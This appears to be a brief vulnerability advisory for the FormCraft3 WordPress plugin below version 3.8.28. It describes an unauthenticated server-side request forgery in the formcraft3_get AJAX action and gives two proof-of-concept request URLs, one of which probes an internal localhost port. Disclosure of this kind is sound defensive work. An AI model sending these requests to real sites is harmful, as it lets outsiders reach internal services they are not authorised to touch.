The plugin does not validate the URL parameter in the formcraft3_get AJAX action, leading to SSRF issues exploitable by unauthenticated users
https://example.com/wp-admin/admin-ajax.php?action=formcraft3_get&URL;=https://wpscan.com https://example.com/wp-admin/admin-ajax.php?action=formcraft3_get&URL;=https://127.0.0.1:8181
CPE | Name | Operator | Version |
---|---|---|---|
formcraft3 | lt | 3.8.28 |